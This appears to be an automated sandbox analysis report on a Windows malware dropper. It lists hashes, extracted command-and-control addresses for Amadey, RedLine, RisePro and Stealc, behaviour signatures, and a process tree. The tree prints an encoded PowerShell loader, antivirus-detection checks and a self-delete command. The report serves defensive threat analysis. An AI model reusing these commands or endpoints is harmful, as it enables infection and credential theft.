Analysis

  • max time kernel
    121s
  • max time network
    155s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    11-05-2024 22:38

General

  • Target

    fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe

  • Size

    1.8MB

  • MD5

    ce33f4b354a2a2ee3a9e34cb4d186683

  • SHA1

    9306604b015e48b82492462410867141c30cde63

  • SHA256

    fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6

  • SHA512

    7505e13c21da7d6b9bddb318941b9ef09913d94f5a3a6b3784be00763c6903a37e57d3401770421b1bb22c1ef07c90b88e91dd4635c130feb681224b2960bae0

  • SSDEEP

    49152:sRYBnI+9uLT+N/AvUvCq5ivfHUHXMAp+aAVDDZ:sInI+9SCZ4ICGi03Vp7AVDV

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
rc4.plain
1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Vidar Stealer 2 IoCs
  • Detect ZGRat V1 5 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • XMRig Miner payload 4 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 19 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 9 IoCs
  • Executes dropped EXE 52 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2952
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2852
    • C:\Users\Admin\AppData\Local\Temp\fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe
      "C:\Users\Admin\AppData\Local\Temp\fff9b378f67a0d449ea0ed9626f98c7cef876e3464c53360dbabe41956fc42d6.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
          "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
          3⤵
            PID:3944
          • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3152
            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
              "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4632
              • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2652
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:3488
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4996
                    • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2992
                    • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                      "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                      7⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4312
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                      7⤵
                        PID:4616
                        • C:\Windows\SysWOW64\choice.exe
                          choice /C Y /N /D Y /T 3
                          8⤵
                            PID:1504
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 380
                        6⤵
                        • Program crash
                        PID:3632
                    • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4816
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        6⤵
                          PID:1832
                      • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                        • C:\Users\Admin\AppData\Local\Temp\enpl.exe
                          "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2788
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k move Organizations Organizations.cmd & Organizations.cmd & exit
                            7⤵
                              PID:3768
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4112
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "wrsa.exe opssvc.exe"
                                8⤵
                                  PID:2400
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist
                                  8⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:468
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                  8⤵
                                    PID:2752
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c md 5593775
                                    8⤵
                                      PID:2088
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /V "EntityKnowStagesJamie" Promotional
                                      8⤵
                                        PID:3196
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c copy /b Enforcement + Orientation + Coach 5593775\f
                                        8⤵
                                          PID:2876
                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5593775\Aviation.pif
                                          5593775\Aviation.pif 5593775\f
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:4464
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2244
                                            9⤵
                                            • Program crash
                                            PID:1104
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2324
                                            9⤵
                                            • Program crash
                                            PID:396
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 5 127.0.0.1
                                          8⤵
                                          • Runs ping.exe
                                          PID:4976
                                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of WriteProcessMemory
                                    PID:4484
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                      6⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2840
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc stop GameServerClient
                                        7⤵
                                        • Launches sc.exe
                                        PID:3060
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameServerClient confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4716
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc delete GameSyncLink
                                        7⤵
                                        • Launches sc.exe
                                        PID:4804
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameSyncLink confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:792
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4492
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService start GameSyncLink
                                        7⤵
                                        • Executes dropped EXE
                                        PID:3004
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                      6⤵
                                        PID:3012
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc stop GameServerClientC
                                          7⤵
                                          • Launches sc.exe
                                          PID:3916
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove GameServerClientC confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2192
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc delete PiercingNetLink
                                          7⤵
                                          • Launches sc.exe
                                          PID:5000
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove PiercingNetLink confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1636
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2012
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService start PiercingNetLink
                                          7⤵
                                          • Executes dropped EXE
                                          PID:1352
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                        6⤵
                                          PID:3292
                                          • C:\Windows\SysWOW64\sc.exe
                                            Sc delete GameSyncLinks
                                            7⤵
                                            • Launches sc.exe
                                            PID:2884
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService remove GameSyncLinks confirm
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2592
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2364
                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                            GameService start GameSyncLinks
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                          6⤵
                                            PID:4716
                                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3016
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            6⤵
                                              PID:4720
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              6⤵
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3588
                                          • C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000008001\udated.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:3180
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              6⤵
                                                PID:4952
                                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4020
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                6⤵
                                                  PID:916
                                              • C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:792
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtADEAYwB3AGMAZQAyAHgAaAB0AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
                                                  6⤵
                                                    PID:3028
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtADEAYwB3AGMAZQAyAHgAaAB0AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3100
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                        8⤵
                                                        • Drops startup file
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2012
                                                        • C:\Users\Admin\Pictures\dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                          "C:\Users\Admin\Pictures\dH6oPXkyyyDL7hNf3xeAvCZ9.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:3592
                                                          • C:\Users\Admin\AppData\Local\Temp\u2rs.0.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\u2rs.0.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:468
                                                          • C:\Users\Admin\AppData\Local\Temp\u2rs.1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\u2rs.1.exe"
                                                            10⤵
                                                            • Executes dropped EXE
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:1692
                                                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                              11⤵
                                                                PID:5660
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 1404
                                                              10⤵
                                                              • Program crash
                                                              PID:4816
                                                          • C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe
                                                            "C:\Users\Admin\Pictures\FlHiR9xpWYhRqycidEY193sD.exe"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:1356
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              10⤵
